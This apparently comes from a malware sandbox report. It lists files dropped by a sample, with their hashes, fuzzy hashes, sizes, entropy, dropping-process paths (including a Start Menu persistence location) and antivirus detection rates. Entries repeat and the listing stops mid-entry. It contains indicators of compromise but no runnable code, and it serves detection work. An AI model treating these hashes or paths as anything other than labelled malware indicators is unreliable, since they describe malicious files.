                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):28160
                                                        Entropy (8bit):5.570953308352568
                                                        Encrypted:false
                                                        SSDEEP:384:BBOVNMHHPrq2YQGpX0dx+D4uuMig590gQDhJvoKfqeXOWnKNey/B/HM/g/6Y70FB:LOCPAEdx+vuNgD0gQ/gCYoTyn+
                                                        MD5:A4F19ADB89F8D88DBDF103878CF31608
                                                        SHA1:46267F43F0188DFD3248C18F07A46448D909BF9B
                                                        SHA-256:D0613773A711634434DB30F2E35C6892FF54EBEADF49CD254377CAECB204EAA4
                                                        SHA-512:23AA30D1CD92C4C69BA23C9D04CEBF4863A9EA20699194F9688B1051CE5A0FAD808BC27EE067A8AA86562F35C352824A53F7FB0A93F4A99470A1C97B31AF8C12
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 4%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.529329139831718
                                                        Encrypted:false
                                                        SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                        MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                        SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                        SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                        SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33280
                                                        Entropy (8bit):5.634433516692816
                                                        Encrypted:false
                                                        SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                        MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                        SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                        SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                        SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Process:C:\Users\user\Desktop\teh76E2k50.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.660491370279985
                                                        Encrypted:false
                                                        SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                        MD5:240E98D38E0B679F055470167D247022
                                                        SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                        SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                        SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32768
                                                        Entropy (8bit):5.645950918301459
                                                        Encrypted:false
                                                        SSDEEP:384:fRDtCEPOaiRBCSzHADW8S3YVDOy6Vgh/UaFTKqrPd62GTB7ZyTG4sTaG:fR/IMEACDoJ86/UoTKqZwJ8TG4
                                                        MD5:E84DCD8370FAC91DE71DEF8DCF09BFEC
                                                        SHA1:2E73453750A36FD3611D5007BBB26A39DDF5F190
                                                        SHA-256:DD7AC164E789CAD96D30930EFE9BBA99698473EDEA38252C2C0EA44043FB1DB5
                                                        SHA-512:77461BA74518E6AE9572EC916499058F45D0576535C20FAE74D0CB904DC79ED668B94885BFC38E24D5DEEAE7FBEF79B768216F1422B2178277DBD3209FC2AFD9
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):294912
                                                        Entropy (8bit):6.010605469502259
                                                        Encrypted:false
                                                        SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                        MD5:00574FB20124EAFD40DC945EC86CA59C
                                                        SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                        SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                        SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 6%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):38400
                                                        Entropy (8bit):5.699005826018714
                                                        Encrypted:false
                                                        SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                        MD5:87765D141228784AE91334BAE25AD743
                                                        SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                        SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                        SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):41472
                                                        Entropy (8bit):5.6808219961645605
                                                        Encrypted:false
                                                        SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                        MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                        SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                        SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                        SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):34816
                                                        Entropy (8bit):5.636032516496583
                                                        Encrypted:false
                                                        SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                        MD5:996BD447A16F0A20F238A611484AFE86
                                                        SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                        SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                        SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.4346552043530165
                                                        Encrypted:false
                                                        SSDEEP:384:fTcm673m4NrYnbspeYMDnw4aU04pWfs8xLDpHEm1r1yNq/:ABNUbfYM8NT4pWkoDxfB4N
                                                        MD5:1DCDE09C6A8CE8F5179FB24D0C5A740D
                                                        SHA1:1A2298CB4E9CAB6F5C2894266F42D7912EDD294B
                                                        SHA-256:1F02230A8536ADB1D6F8DADFD7CA8CA66B5528EC98B15693E3E2F118A29D49D8
                                                        SHA-512:5D3D5B9E6223501B2EE404937C62893BDDB735A2B8657FAFF8C8F4CED55A9537F2C11BA97734F72360195C35CE6C0BF1EC4AAAFD77AB569919B03344ADFD9D77
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 6%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):126976
                                                        Entropy (8bit):6.057993947082715
                                                        Encrypted:false
                                                        SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                        MD5:16B480082780CC1D8C23FB05468F64E7
                                                        SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                        SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                        SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):39936
                                                        Entropy (8bit):5.629584586954759
                                                        Encrypted:false
                                                        SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                        MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                        SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                        SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                        SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 13%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):24064
                                                        Entropy (8bit):5.492504448438552
                                                        Encrypted:false
                                                        SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                        MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                        SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                        SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                        SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 33%
                                                        Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):50176
                                                        Entropy (8bit):5.723168999026349
                                                        Encrypted:false
